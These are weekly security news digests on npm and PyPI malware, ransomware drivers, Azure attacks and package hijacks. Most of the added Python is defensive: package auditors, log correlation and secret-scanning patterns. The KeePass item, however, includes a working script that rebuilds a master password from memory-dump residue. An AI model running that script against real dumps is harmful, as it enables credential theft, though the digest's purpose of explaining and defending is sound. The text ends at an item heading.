Programmer’s Digest #33

05/18/2023-05/24/2023 PyPI Repository Under Attack, NPM Packages for Node.js Hiding Dangerous TurkoRat Malware, Malicious Windows Kernel Drivers And More

1. PyPI Repository Under Attack: User Sign-Ups and Package Uploads Temporarily Halted

The maintainers of the Python Package Index (PyPI) temporarily disabled new user sign-ups and new project uploads until further notice after a surge of rogue packages. No additional details about the nature of the malware or the threat actors behind those packages were disclosed. The freeze comes as software registries such as PyPI have proven time and again to be a popular target for attackers looking to poison the software supply chain and compromise developer environments. Earlier this week, security firm Phylum uncovered an active campaign that uses OpenAI ChatGPT-themed lures to bait developers into downloading a malicious Python module capable of reading clipboard content in order to hijack cryptocurrency transactions. In a similar discovery, ReversingLabs identified npm packages named nodejs-encrypt-agent and nodejs-cookie-proxy-agent that drop a trojan called TurkoRat.

2. npm Packages Caught Serving TurkoRAT Binaries That Mimic NodeJS

Researchers have discovered multiple npm packages, named to look like NodeJS libraries, that bundle a Windows executable resembling the NodeJS runtime but actually dropping a trojan. Given their stealth and very low detection rate, the packages sat on the npmjs.com registry for more than two months before ReversingLabs analyzed them.

The package nodejs-encrypt-agent initially appeared legitimate, but inconsistencies in how it presented itself prompted a closer look. ReversingLabs found that it contained a malicious portable executable (PE) file named lib.exe of roughly 100 MB that closely resembled a genuine NodeJS binary, which made the payload easy to overlook. The PE file runs TurkoRAT, a customizable infostealer that targets login credentials and crypto wallets while evading sandboxes and debuggers. A second package, nodejs-cookie-proxy-agent, hid the same executable inside a dependency named axios-proxy. ReversingLabs detected and reported the packages; the case underscores the continuing risk that unvetted open source packages pose to the software supply chain.
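The red flags in this case, a large Windows PE file shipped inside an npm package together with a script that launches it at install time, are cheap to check for before a package reaches a developer machine. The following Python script is an added example, not ReversingLabs' or npm's tooling: it walks an unpacked package directory, flags any file whose first bytes are the PE "MZ" header, lists the install-time lifecycle hooks in package.json, and marks the combination as suspicious. The sample package it builds (package name, file names and hook command) is constructed for this example; the real packages are not reproduced here.

```python
import json
import tempfile
from pathlib import Path

PE_MAGIC = b"MZ"                          # DOS header that begins every Windows PE file
LARGE_BINARY_BYTES = 50 * 1024 * 1024     # the dropper described above was roughly 100 MB
INSTALL_HOOKS = ("preinstall", "install", "postinstall")  # run automatically by `npm install`


def find_pe_files(package_dir):
    """Walk an unpacked npm package and report every file that starts with a PE header."""
    root = Path(package_dir)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        with path.open("rb") as fh:
            magic = fh.read(len(PE_MAGIC))
        if magic == PE_MAGIC:
            size = path.stat().st_size
            findings.append({
                "path": str(path.relative_to(root)),
                "size": size,
                "large": size >= LARGE_BINARY_BYTES,
            })
    return findings


def find_install_hooks(package_dir):
    """Return the lifecycle scripts in package.json that execute during installation."""
    manifest = Path(package_dir) / "package.json"
    if not manifest.is_file():
        return {}
    scripts = json.loads(manifest.read_text()).get("scripts", {})
    return {name: cmd for name, cmd in scripts.items() if name in INSTALL_HOOKS}


def audit_package(package_dir):
    """A PE binary plus an install-time hook is the combination worth blocking or reviewing."""
    pe_files = find_pe_files(package_dir)
    hooks = find_install_hooks(package_dir)
    return {
        "pe_files": pe_files,
        "install_hooks": hooks,
        "suspicious": bool(pe_files) and bool(hooks),
    }


def build_sample_package(root):
    """Constructed fixture shaped like the packages described above.
    Package name, file names and the hook command are invented for this example."""
    pkg = Path(root) / "nodejs-example-agent"
    pkg.mkdir(parents=True, exist_ok=True)
    (pkg / "package.json").write_text(json.dumps({
        "name": "nodejs-example-agent",
        "version": "1.0.0",
        "main": "index.js",
        "scripts": {"postinstall": "node index.js"},
    }))
    (pkg / "index.js").write_text("require('child_process').execFile('lib.exe');\n")
    # 4 KiB placeholder: the PE magic followed by zero padding, not a real executable
    (pkg / "lib.exe").write_bytes(PE_MAGIC + b"\x00" * 4094)
    return str(pkg)


def audit_sample_package():
    """Build the fixture in a temporary directory, audit it, and clean up."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_package(build_sample_package(tmp))


if __name__ == "__main__":
    print(json.dumps(audit_sample_package(), indent=2))
```

In a CI gate the same two functions would run against the output of `npm pack` before the dependency is approved; the size threshold is deliberately generous, since legitimate native modules rarely ship a tens-of-megabytes PE file next to a postinstall hook.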

3. Privacy Sandbox Initiative: Google to Phase Out Third-Party Cookies Starting 2024

Google has announced plans to officially flip the switch on its twice-delayed Privacy Sandbox initiatives as it slowly works its way to deprecate support for third-party cookies in Chrome browser. To that end, the search and advertising giant said it intends to phase out third-party cookies for 1% of Chrome users globally in the first quarter of 2024. This will support developers in conducting real world experiments that assess the readiness and effectiveness of their products without third-party cookies. Prior to rolling this out, Google said it would introduce the ability for third-party developers to simulate the process for a configurable subset of their users (up to 10%) in Q4 2023. Privacy Sandbox is a two-pronged project for the web and Android that aims to limit covert tracking by eliminating the need for third-party cookies and cross-app identifiers and still serving relevant content and ads in a privacy-preserving manner.

4. Malicious Windows Kernel Drivers Used In BlackCat Ransomware Attacks

BlackCat (ALPHV) affiliates used signed malicious Windows kernel drivers to evade security software during attacks. The driver, an improved version of the POORTRY malware, was spotted by Trend Micro and had previously been identified by Microsoft, Mandiant, Sophos, and SentinelOne in ransomware attacks. POORTRY is a Windows kernel driver that was signed through legitimate accounts in Microsoft's Windows Hardware Developer Program whose keys had been stolen. Security products typically protect their processes from termination or tampering by user-mode code, but a kernel driver runs at the highest privilege level and can terminate nearly any process. The ransomware actors initially used the Microsoft-signed POORTRY driver, but high detection rates and revoked code-signing keys prompted them to deploy an updated version. The updated POORTRY driver, signed with a stolen or leaked cross-signing certificate, helps the BlackCat operation elevate privileges on compromised machines and terminate security-related processes.

5. KeePass Exploit Allows Attackers to Recover Master Passwords from Memory

A proof-of-concept (PoC) has been released for a security flaw in the KeePass password manager that could be exploited to recover a victim's master password in cleartext under specific circumstances. The issue, tracked as CVE-2023-32784, affects KeePass 2.x for Windows, Linux, and macOS and is expected to be fixed in version 2.54, likely to be released early next month. The vulnerability lies in how the custom text box used for entering the master password handles input: it leaves a trace of every character the user types in process memory. An attacker who can obtain a dump of the process memory (the same residue may survive in a swap or hibernation file) can therefore reassemble the password in plaintext, with the exception of the first character. Users are advised to update to KeePass 2.54 once it becomes available.
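How the leak becomes a password: KeePass masks the master password box with one U+25CF bullet per hidden character, and for each keystroke a managed string of n-1 bullets followed by the newly typed character is left behind in memory. The Python below is an added example written for this page, not the published PoC or KeePass code: it scans a byte buffer for UTF-16LE runs of bullets followed by one character, groups the characters by bullet count (which equals the character's position), and reassembles the password with a placeholder for the first character, which is the only one never preceded by a bullet. The memory image it scans is constructed by build_fake_dump; on a real target the input would be a process dump, swap or hibernation file.

```python
import re
from collections import Counter, defaultdict

# KeePass masks the master password box with U+25CF BLACK CIRCLE. While the password is
# typed, a managed string of n-1 bullets followed by the n-th character is left in memory
# for each keystroke, e.g. "●a", "●●s", "●●●s" for "Pass...". The first character is the
# only one never preceded by a bullet, so it cannot be recovered this way.
BULLET = "\u25cf"
LEAK_RE = re.compile(rb"((?:\xcf\x25)+)(..)", re.DOTALL)   # UTF-16LE bullets, then one BMP char


def collect_candidates(dump):
    """Map character position -> Counter of characters observed at that position."""
    candidates = defaultdict(Counter)
    for match in LEAK_RE.finditer(dump):
        position = len(match.group(1)) // 2           # bullet count == index of the typed char
        char = match.group(2).decode("utf-16-le", errors="replace")
        if char in (BULLET, "\ufffd"):                # run cut off by an unrelated bullet or garbage
            continue
        candidates[position][char] += 1
    return candidates


def recover_master_password(dump, placeholder="?"):
    """Best-effort reconstruction: the most frequent candidate per position (typos that were
    backspaced leave competing candidates); the first character is unknown and shown as the
    placeholder. Returns "" when the dump holds no leak pattern at all."""
    candidates = collect_candidates(dump)
    if not candidates:
        return ""
    length = max(candidates) + 1
    recovered = [placeholder]
    for i in range(1, length):
        counter = candidates.get(i)
        recovered.append(counter.most_common(1)[0][0] if counter else placeholder)
    return "".join(recovered)


def build_fake_dump(password, filler=b"\x00" * 32):
    """Constructed memory image that reproduces the leak pattern (test data, not a real dump)."""
    chunks = [filler]
    for i in range(1, len(password)):
        chunks.append((BULLET * i + password[i]).encode("utf-16-le"))
        chunks.append(filler)
    return b"".join(chunks)


if __name__ == "__main__":
    dump = build_fake_dump("Password123!")
    print(recover_master_password(dump))   # -> ?assword123!
```

The fix in 2.54 changes how the text box stores the typed text so that these per-keystroke strings are no longer created; until then, the practical mitigations are to restart the machine after using KeePass (so the residue does not persist in hibernation or swap) and to treat any host where an attacker can read process memory as already compromised.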

6. Threat Group UNC3944 Abusing Azure Serial Console for Total VM Takeover

UNC3944, a financially motivated actor also tracked as Roasted 0ktapus, has been abusing the Microsoft Azure Serial Console on virtual machines (VMs) to install third-party remote management tools. Because the serial console is reached through the Azure control plane rather than the VM's network interfaces, this method evades traditional network-based detection in Azure while granting the attacker full administrative access to compromised VMs. UNC3944, which emerged last year, has used SIM-swapping attacks to breach telecommunications and business process outsourcing companies. Google-owned Mandiant previously observed the group using a loader named STONESTOP to install a malicious signed driver called POORTRY, which terminates security processes and deletes files as part of a bring-your-own-vulnerable-driver (BYOVD) attack. Initial access likely begins with SMS phishing messages to privileged users to harvest their credentials, followed by a SIM swap to intercept SMS-based verification codes. With that access, UNC3944 leverages Azure VM extensions and the serial console to gain administrative control, then uses PowerShell to deploy legitimate remote administration tools, a living-off-the-land approach that evades detection while advancing the attack.

2023   digest   programmers'

Programmer’s Digest #32

05/11/2023-05/17/2023 11 New Vulnerabilities Expose OT Networks, New Flaw in WordPress Plugin, New Stealthy Variant of Linux Backdoor And More

1. Industrial Cellular Routers at Risk: 11 New Vulnerabilities Expose OT Networks

Several security vulnerabilities in cloud management platforms linked to three industrial cellular router vendors were revealed by Israeli cybersecurity firm OTORIO at the Black Hat Asia 2023 conference. These vulnerabilities could expose operational technology (OT) networks to external attacks, impacting critical infrastructure sectors like substations, water utilities, oil fields, and pipelines. The weaknesses affect the cloud-based management solutions offered by Sierra Wireless, Teltonika Networks, and InHand Networks. Exploiting the vulnerabilities could enable remote code execution, full control over devices and OT networks, exfiltration of sensitive information, and unauthorized access with elevated permissions. The flaws involve weak asset registration mechanisms, security configuration flaws, and issues in external APIs and interfaces. Collaboration with Claroty also led to the discovery of additional vulnerabilities in Teltonika Networks’ RMS and RUT router firmware, allowing arbitrary code execution and command injection.

2. New ‘MichaelKors’ Ransomware-as-a-Service Targeting Linux and VMware ESXi Systems

MichaelKors, a new ransomware-as-a-service (RaaS) operation, has emerged targeting Linux and VMware ESXi systems as of April 2023. CrowdStrike has observed a growing number of adversaries focusing on ESXi, which does not support third-party agents or antivirus software; that blind spot, combined with the number of workloads a single hypervisor hosts, makes the widely used ESXi hypervisor an appealing target, a technique CrowdStrike calls hypervisor jackpotting. Furthermore, Babuk source code leaked in September 2021 has been used by 10 different ransomware families, including Conti and REvil, to build lockers for VMware ESXi hypervisors. Various e-crime groups such as ALPHV (BlackCat), Black Basta, Defray, and others have also updated their tactics to target ESXi. Attackers use compromised credentials, gain elevated privileges, and leverage known vulnerabilities to breach ESXi hypervisors and obtain unrestricted access to the underlying resources. To limit the impact of hypervisor jackpotting, organizations are advised to avoid direct access to ESXi hosts, enable two-factor authentication, take periodic backups of ESXi datastore volumes, apply security updates, and conduct security posture reviews.

3. XWorm Malware Exploits Follina Vulnerability in New Wave of Attacks

Researchers have uncovered an ongoing phishing campaign, named MEME#4CHAN, that utilizes a unique attack chain to distribute the XWorm malware. The attacks have primarily targeted manufacturing firms and healthcare clinics in Germany. The campaign employs meme-filled PowerShell code and heavily obfuscated XWorm payloads to infect victims. The attackers use reservation-themed lures in phishing emails, tricking recipients into opening malicious documents. Rather than relying on macros, the threat actors exploit the Follina vulnerability to drop an obfuscated PowerShell script. This script bypasses Antimalware Scan Interface (AMSI), disables Microsoft Defender, establishes persistence, and executes the .NET binary containing XWorm. The PowerShell script includes a variable named “$CHOTAbheem,” possibly indicating a Middle Eastern or Indian background of the attackers, although attribution remains unconfirmed. XWorm is a readily available malware with various features for stealing sensitive information from infected systems.

4. New Stealthy Variant of Linux Backdoor BPFDoor Emerges from the Shadows

A new variant of a Linux backdoor called BPFDoor has been discovered by cybersecurity firm Deep Instinct. BPFDoor, previously documented by PwC and Elastic Security Labs in May 2022, is associated with a Chinese threat actor known as Red Menshen. The malware is designed to establish persistent remote access to compromised environments, particularly targeting telecom providers in the Middle East and Asia. BPFDoor utilizes Berkeley Packet Filters (BPF) technology for network communications and command execution, enabling threat actors to evade firewalls and filter unnecessary data. The latest variant of BPFDoor demonstrates increased evasiveness by removing hard-coded indicators, incorporating encryption with libtomcrypt, and utilizing a reverse shell for command-and-control communication. It avoids termination by ignoring operating system signals and establishes an encrypted reverse shell session with the C2 server. BPFDoor’s ability to remain undetected for an extended period reflects its sophistication, as cybercriminals increasingly target Linux systems prevalent in enterprise and cloud environments.

5. New Flaw in WordPress Plugin Used by Over a Million Sites Under Active Exploitation

A security vulnerability has been discovered in the Essential Addons for Elementor WordPress plugin, potentially allowing attackers to gain elevated privileges. The flaw, tracked as CVE-2023-32243, was addressed in version 5.7.2 of the plugin. Successful exploitation of the vulnerability could enable an unauthenticated user to reset the password of any user on the affected site. This could result in the compromise of administrator accounts and complete control over the website. The issue has existed since version 5.4.0 of the plugin. The disclosure follows a previous severe flaw found in the same plugin, and it coincides with a wave of attacks targeting WordPress sites with SocGholish malware. The attackers are using compression techniques to conceal the malware and evade detection. Additionally, a malvertising campaign has been identified that tricks visitors to adult websites with fake Windows update ads, leading to the installation of the “Invalid Printer” loader, which can deploy the Aurora information stealer malware.

6. Babuk Source Code Sparks 9 Different Ransomware Strains Targeting VMware ESXi Systems

The leak of the Babuk ransomware code in September 2021 has led to the development of multiple ransomware families targeting VMware ESXi systems. As many as nine different ransomware variants have emerged since late 2022 and early 2023, all based on the leaked Babuk source code. The availability of the source code has allowed cybercriminals with limited expertise to target Linux systems effectively. Among the ransomware strains based on the Babuk code are Cylance, Rorschach (also known as BabLock), and RTM Locker. SentinelOne's analysis also reveals overlaps between Babuk and other ransomware families such as Conti and REvil (also known as REvix), indicating the adoption of Babuk features in their code. Additional families, such as LOCK4, DATAF, Mario, Play, and Babuk 2023 (also known as XVGV), have incorporated various elements from the Babuk code as well. However, SentinelOne found no significant similarities between Babuk and ALPHV, Black Basta, Hive, LockBit or ESXiArgs, suggesting that earlier reports linking them to Babuk were misattributions. SentinelOne also notes that actors may turn to Babuk's Go-based NAS locker, as the Go programming language continues to gain popularity among threat actors. In a separate development, threat actors associated with the Royal ransomware, believed to be former members of Conti, have introduced an ELF variant capable of targeting Linux and ESXi environments, expanding their attack capabilities.

7. Hackers Use Azure Serial Console For Stealthy Access To VMs

A financially motivated group tracked by Mandiant as UNC3944 is using phishing and SIM-swapping attacks to hijack Microsoft Azure administrator accounts and gain access to virtual machines. From there, the attackers abuse the Azure Serial Console to install remote management software for persistence and abuse Azure VM extensions for stealthy surveillance. Mandiant reports that UNC3944 has been active since at least May 2022 and that the campaign aims to steal data from victim organizations using Microsoft's cloud computing service. UNC3944 was previously credited with creating the STONESTOP loader and POORTRY kernel-mode driver toolkit used to terminate security software; those kernel drivers were signed using stolen Microsoft hardware developer accounts.
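Both this item and the UNC3944 write-up in Digest #33 above describe the same chain: a compromised administrator account, a VM extension write or run command, and a Serial Console connection to the same VM. All three are control-plane operations recorded in the Azure Activity Log, so they can be correlated even though the serial console never touches the guest's network. The Python below is an added example, not Mandiant's or Microsoft's detection content: it filters constructed, simplified Activity Log records for those operations, groups them by caller and VM, and raises a high-severity alert when a serial console connection and a deployment operation by the same caller on the same VM fall within one hour. The operation names are Azure's; the callers, subscription, resource IDs and timestamps are invented for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Azure Activity Log operation names (compared case-insensitively; the log upper-cases them).
SERIAL_CONSOLE_CONNECT = "microsoft.serialconsole/serialports/connect/action"
VM_EXTENSION_WRITE = "microsoft.compute/virtualmachines/extensions/write"
VM_RUN_COMMAND = "microsoft.compute/virtualmachines/runcommand/action"
DEPLOY_OPS = {VM_EXTENSION_WRITE, VM_RUN_COMMAND}
WATCHED_OPS = DEPLOY_OPS | {SERIAL_CONSOLE_CONNECT}


def vm_resource_id(name):
    """Constructed resource ID for a VM in an invented subscription and resource group."""
    return ("/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/prod"
            "/providers/Microsoft.Compute/virtualMachines/" + name)


# Constructed, simplified Activity Log records: field names follow the real schema,
# callers, VM names and timestamps are invented for this example.
SAMPLE_EVENTS = [
    {"eventTimestamp": "2023-05-10T09:12:03Z", "caller": "alice@example.com",
     "operationName": "Microsoft.Compute/virtualMachines/start/action",
     "resourceId": vm_resource_id("web01")},
    {"eventTimestamp": "2023-05-10T10:01:44Z", "caller": "it-admin@example.com",
     "operationName": "Microsoft.Compute/virtualMachines/extensions/write",
     "resourceId": vm_resource_id("web01") + "/extensions/CustomScriptExtension"},
    {"eventTimestamp": "2023-05-10T10:05:19Z", "caller": "it-admin@example.com",
     "operationName": "Microsoft.SerialConsole/serialPorts/connect/action",
     "resourceId": vm_resource_id("web01") + "/providers/Microsoft.SerialConsole/serialPorts/0"},
    {"eventTimestamp": "2023-05-10T14:00:02Z", "caller": "ops@example.com",
     "operationName": "Microsoft.SerialConsole/serialPorts/connect/action",
     "resourceId": vm_resource_id("db01") + "/providers/Microsoft.SerialConsole/serialPorts/0"},
    {"eventTimestamp": "2023-05-11T08:30:00Z", "caller": "ops@example.com",
     "operationName": "Microsoft.Compute/virtualMachines/extensions/write",
     "resourceId": vm_resource_id("db01") + "/extensions/AzureMonitorLinuxAgent"},
]


def parse_timestamp(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def vm_from_resource_id(resource_id):
    """Reduce a child resource ID (extension, serial port) to the owning VM's ID."""
    parts = resource_id.split("/")
    if "virtualMachines" in parts:
        idx = parts.index("virtualMachines")
        return "/".join(parts[:idx + 2])
    return resource_id


def detect_serial_console_abuse(events, window=timedelta(hours=1)):
    """Group watched operations by (caller, VM). Every serial console connection is at least a
    medium alert; one within `window` of an extension write or run command by the same caller
    on the same VM is high, because that is the sequence described above."""
    by_key = defaultdict(list)
    for event in events:
        op = event["operationName"].lower()
        if op in WATCHED_OPS:
            key = (event["caller"], vm_from_resource_id(event["resourceId"]))
            by_key[key].append((parse_timestamp(event["eventTimestamp"]), op))

    alerts = []
    for (caller, vm), ops in by_key.items():
        console_times = [t for t, op in ops if op == SERIAL_CONSOLE_CONNECT]
        if not console_times:
            continue
        deploy_times = [t for t, op in ops if op in DEPLOY_OPS]
        correlated = any(abs(d - c) <= window for c in console_times for d in deploy_times)
        alerts.append({
            "caller": caller,
            "vm": vm.rsplit("/", 1)[-1],
            "severity": "high" if correlated else "medium",
            "serial_console_connects": len(console_times),
            "deploy_operations": len(deploy_times),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_serial_console_abuse(SAMPLE_EVENTS):
        print(alert)
```

The medium alert on every serial console connection is intentional: in most estates the feature is rarely used, so an allowlist of break-glass accounts plus a hard look at each remaining hit is cheaper than missing the one that matters. Disabling the Serial Console at the subscription level where it is not needed removes the technique altogether.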


Programmer’s Digest #31

05/04/2023-05/10/2023 Critical PaperCut Vulnerability, MSI Data Breach, New Linux Kernel NetFilter Flaw And More

1. Microsoft Warns of State-Sponsored Attacks Exploiting Critical PaperCut Vulnerability

Iranian nation-state groups have been exploiting a critical vulnerability in PaperCut print management software, according to Microsoft’s threat intelligence team. Both Mango Sandstorm (Mercury) and Mint Sandstorm (Phosphorus) have been observed exploiting CVE-2023-27350 to gain initial access. While the former is said to be using tools from previous intrusions to connect to their C2 infrastructure, the latter has been able to quickly incorporate proof-of-concept exploits into their operations. Both groups are known state-sponsored actors, with Mango Sandstorm linked to Iran’s Ministry of Intelligence and Security and Mint Sandstorm associated with the Islamic Revolutionary Guard Corps. This comes after cybercrime gang Lace Tempest was found to have abused the same vulnerability to distribute ransomware. PaperCut released a patch for the flaw on March 8, 2023, and Trend Micro’s Zero Day Initiative is expected to release more technical information about it on May 10, 2023.

2. MSI Data Breach: Private Code Signing Keys Leaked on the Dark Web

The Money Message ransomware gang, which breached MSI earlier this year, has leaked the company's private code signing keys on a dark website. The leaked data includes firmware image signing keys for 57 MSI products and private Intel Boot Guard signing keys used in 116 MSI products. The impact extends beyond MSI to device vendors such as Intel, Lenovo, and Supermicro. Intel Boot Guard is a hardware-based security technology that prevents tampered UEFI firmware from executing. The leak undermines firmware integrity checks, enabling threat actors to sign and deploy malicious firmware updates and payloads that pass verification; because the Boot Guard key manifest is anchored in one-time-programmable fuses on the platform, the leaked keys cannot simply be rotated with a firmware update. The incident follows a double extortion ransomware attack on MSI by the Money Message gang, after which MSI reported a gradual return to normal operations with no major financial impact. Users were advised to obtain firmware/BIOS updates exclusively from the official website and to beware of fraudulent emails claiming collaboration with MSI. Notably, this is not the first time UEFI firmware code has been exposed: a similar incident occurred with the Alder Lake BIOS source code in October 2022.

3. New Vulnerability in Popular WordPress Plugin Exposes Over 2 Million Sites to Cyberattacks

Users of the Advanced Custom Fields plugin for WordPress are being urged to update to version 6.1.6 following the discovery of a security flaw. The issue, assigned the identifier CVE-2023-30777, is a reflected cross-site scripting (XSS) vulnerability that could be abused to inject arbitrary executable scripts into otherwise benign websites. The plugin, available in both a free and a pro version, has over two million active installations. The vulnerability allows an unauthenticated attacker to steal sensitive information or, in this case, escalate privileges on the WordPress site by tricking a privileged user into visiting a crafted URL. Reflected XSS attacks usually occur when victims are tricked into clicking a bogus link sent via email or another route; the malicious code is sent to the vulnerable website, which reflects the attack back to the user's browser. This element of social engineering means that reflected XSS does not have the same reach and scale as stored XSS, which pushes threat actors to distribute the malicious link to as many victims as possible. Note that CVE-2023-30777 can be triggered on a default installation or configuration of Advanced Custom Fields, but only by logged-in users who have access to the plugin: the crafted URL has to be opened by such a user for the injected script to run.

4. Packagist Repository Hacked: Over a Dozen PHP Packages with 500 Million Installs Compromised

PHP package repository Packagist revealed that an "attacker" gained access to four inactive accounts on the platform and hijacked over a dozen packages with more than 500 million installs to date. The attacker forked each of the packages and replaced the package description in composer.json with their own message, but did not otherwise make any malicious changes. The package URLs were then changed to point to the forked repositories. The four user accounts had access to a total of 14 packages, including multiple Doctrine packages. In a nutshell, the attack made it possible to repoint the Packagist page for each of these packages to a namesake GitHub repository, altering the installation workflow used within Composer environments: developers downloading the packages would receive the forked version instead of the actual contents. Packagist said no additional malicious changes were distributed and that all the accounts were disabled and their packages restored on May 2, 2023. It is also urging users to enable two-factor authentication (2FA) to secure their accounts.
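Because Composer resolves a package to whatever repository Packagist currently points at, a hijack like this one shows up in composer.lock as a git source URL under an unexpected account. The Python below is an added example, not Packagist's or Composer's tooling: it reads a lock file and flags every package whose source repository owner differs from the package's vendor prefix (or from an explicit owner map, since many legitimate vendors publish from a differently named account). The lock fragment it checks is constructed; the Doctrine package names are of the kind mentioned above, while the fork owner is invented and the commit references are zero placeholders.

```python
import json
from urllib.parse import urlparse

# Constructed composer.lock fragment. The commit references are zero placeholders and the
# fork owner is invented; the shape of each entry follows Composer's lock format.
PLACEHOLDER_REF = "0" * 40
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "doctrine/instantiator", "version": "2.0.0",
         "source": {"type": "git", "url": "https://github.com/doctrine/instantiator.git",
                    "reference": PLACEHOLDER_REF}},
        {"name": "doctrine/lexer", "version": "3.0.0",
         "source": {"type": "git", "url": "git@github.com:doctrine/lexer.git",
                    "reference": PLACEHOLDER_REF}},
        {"name": "doctrine/annotations", "version": "2.0.1",
         "source": {"type": "git", "url": "https://github.com/example-fork-owner/annotations.git",
                    "reference": PLACEHOLDER_REF}},
    ],
    "packages-dev": [],
})


def repo_owner(url):
    """Owner (user or organisation) of a git hosting URL; handles https:// and scp-like
    git@host:owner/repo.git forms. Returns None when the URL has no owner/repo path."""
    if "://" not in url and url.startswith("git@"):
        path = url.split(":", 1)[1]
    else:
        path = urlparse(url).path
    parts = [p for p in path.split("/") if p]
    return parts[0].lower() if len(parts) >= 2 else None


def check_lock_sources(lock_json, owner_map=None):
    """Flag packages whose source repository owner is not the expected one.
    Default expectation: owner == vendor prefix of the package name. owner_map overrides
    that per vendor, since many legitimate vendors publish from a differently named account.
    Packages without a git source (dist-only) are flagged too: there is nothing to verify."""
    owner_map = owner_map or {}
    lock = json.loads(lock_json)
    findings = []
    for pkg in lock.get("packages", []) + lock.get("packages-dev", []):
        vendor = pkg["name"].split("/", 1)[0].lower()
        expected = owner_map.get(vendor, vendor).lower()
        source = pkg.get("source") or {}
        actual = repo_owner(source.get("url", "")) if source.get("type") == "git" else None
        if actual != expected:
            findings.append({"package": pkg["name"], "expected_owner": expected,
                             "actual_owner": actual, "url": source.get("url")})
    return findings


if __name__ == "__main__":
    for finding in check_lock_sources(SAMPLE_LOCK):
        print(finding)
```

Run against the lock file in CI, the check turns a silent repoint into a failed build; the first run will surface a handful of legitimate vendor/owner mismatches, which belong in the owner map once a human has confirmed them.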

5. Researchers Discover 3 Vulnerabilities in Microsoft Azure API Management Service

Microsoft Azure API Management service has been found to have three security vulnerabilities, as disclosed by Israeli cloud security firm Ermetic. The vulnerabilities include two server-side request forgery (SSRF) flaws and one unrestricted file upload functionality in the API Management developer portal. Exploiting the SSRF vulnerabilities would allow attackers to send requests from the service’s CORS Proxy and hosting proxy, gaining access to internal Azure assets, bypassing web application firewalls, and potentially causing denial of service. The file upload vulnerability enables attackers to upload malicious files to Azure’s internal workload. Azure API Management is a platform that allows organizations to securely expose their APIs. Microsoft has patched all three vulnerabilities following responsible disclosure. 

6. GitHub Now Auto-Blocks Token and API Key Leaks for All Repos

GitHub is now automatically blocking the leak of sensitive information such as API keys and access tokens for all public code repositories. The feature, called push protection, prevents leaks proactively by scanning for secrets before a `git push` is accepted. It recognises 69 token types (API keys, private keys, secret keys, authentication tokens, access tokens, management certificates, credentials, and more) with a low false-positive rate. Since its beta release, developers who enabled it averted around 17,000 accidental exposures of sensitive information, saving more than 95,000 hours that would otherwise have gone into revoking, rotating, and remediating compromised secrets, according to GitHub. For private repositories, push protection remains generally available only with a GitHub Advanced Security (GHAS) license.
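A local equivalent of push protection is a pre-push hook that scans only the lines a push would add. The Python below is an added example and not GitHub's scanner or its rules: it walks a unified diff, tracks new-file line numbers from the hunk headers, matches added lines against a few well-known token formats (GitHub personal access token, AWS access key ID, PEM private key header), redacts what it reports, and honours an allowlist for known dummy values the way a reviewer-approved bypass would. The diff it scans is constructed; the AWS value is the example key from AWS's own documentation and the GitHub token is 36 placeholder characters, so neither is a live credential.

```python
import re

# A few well-known token formats. A production scanner such as GitHub's covers many more
# providers; these rules are written for this example and are not GitHub's.
SECRET_PATTERNS = {
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
}
HUNK_HEADER_RE = re.compile(r"^@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@")


def redact(secret):
    """Keep a recognisable prefix, hide the rest, so findings can be logged safely."""
    keep = min(6, len(secret))
    return secret[:keep] + "*" * (len(secret) - keep)


def scan_diff(diff_text, allowlist=frozenset()):
    """Scan only the lines a push would add. Tracks new-file line numbers from hunk headers;
    values in `allowlist` (known dummies, approved bypasses) are not reported."""
    findings = []
    current_file = None
    new_line = 0
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):                      # new-file header
            current_file = raw[4:].removeprefix("b/")
            continue
        header = HUNK_HEADER_RE.match(raw)
        if header:
            new_line = int(header.group(1))
            continue
        if raw.startswith("-") or raw.startswith("\\"):  # removed lines, "\ No newline" marker
            continue
        if raw.startswith("+"):                         # added line: the only thing we scan
            content = raw[1:]
            for kind, pattern in SECRET_PATTERNS.items():
                for hit in pattern.finditer(content):
                    if hit.group(0) in allowlist:
                        continue
                    findings.append({"file": current_file, "line": new_line,
                                     "type": kind, "value": redact(hit.group(0))})
            new_line += 1
        elif raw.startswith(" ") or raw == "":          # context line (blank context may be stripped)
            new_line += 1
    return findings


def should_block_push(findings):
    """Push protection semantics: any finding that is not allowlisted rejects the push."""
    return bool(findings)


# Constructed diff: the AWS value is the example key from AWS documentation and the GitHub
# token is 36 placeholder characters; neither is a live credential.
SAMPLE_DIFF = """\
diff --git a/config/settings.py b/config/settings.py
--- a/config/settings.py
+++ b/config/settings.py
@@ -1,4 +1,6 @@
 import os
 
-AWS_ACCESS_KEY_ID = os.environ["AWS_ACCESS_KEY_ID"]
+AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
+GITHUB_TOKEN = "ghp_0123456789abcdefghijklmnopqrstuvwxyz"
 DEBUG = False
+LOG_LEVEL = "INFO"
"""

if __name__ == "__main__":
    for finding in scan_diff(SAMPLE_DIFF):
        print(finding)
    print("blocked:", should_block_push(scan_diff(SAMPLE_DIFF)))
```

Wired into `.git/hooks/pre-push`, the script would receive the output of `git diff <remote-sha>..<local-sha>` and exit non-zero when should_block_push is true. Scanning added lines only keeps the hook fast and avoids re-flagging history, which is the same trade-off GitHub makes by checking at push time rather than on the whole repository.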

7. New Linux Kernel NetFilter Flaw Gives Attackers Root Privileges

